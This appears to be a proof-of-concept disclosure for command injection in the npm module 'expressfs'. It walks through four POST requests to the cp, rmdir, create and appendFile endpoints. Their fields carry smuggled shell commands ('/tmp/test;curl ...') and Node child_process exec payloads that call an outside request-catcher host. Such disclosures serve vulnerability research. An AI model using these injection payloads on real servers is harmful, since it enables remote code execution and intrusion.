- module : expressfs
- version : All
- severity: high
docker-compose up --build
-
open the browser and enter the following url
https://shieldfy.requestcatcher.com/
NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
-
launch this
POST
request from postman http://localhost:8000/expressfs.cp-
BODY
KEY VALUE destination /tmp/test;curl https://shieldfy.requestcatcher.com/hacked-expressfs.cp
-
-
CHECK the requestcatcher tab in the browser you will see the result of command injection attack
-
open the browser and enter the following url
https://shieldfy.requestcatcher.com/
NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
-
launch this
POST
request from postman http://localhost:8000/expressfs.rmdir-
BODY
KEY VALUE path /tmp/test;curl https://shieldfy.requestcatcher.com/hacked-expressfs.rmdir
-
-
CHECK the requestcatcher tab in the browser you will see the result of command injection attack
-
open the browser and enter the following url
https://shieldfy.requestcatcher.com/
NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
-
launch this
POST
request from postman http://localhost:8000/expressfs.create-
BODY
KEY VALUE path ./eviil.js content exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.create")
-
-
CHECK the requestcatcher tab in the browser you will see the result of command injection attack
-
open the browser and enter the following url
https://shieldfy.requestcatcher.com/
NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
-
launch this
POST
request from postman http://localhost:8000/expressfs.appendFile-
BODY
KEY VALUE path ./eviil.js content ; exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.appendFile")
-
-
CHECK the requestcatcher tab in the browser you will see the result of command injection attack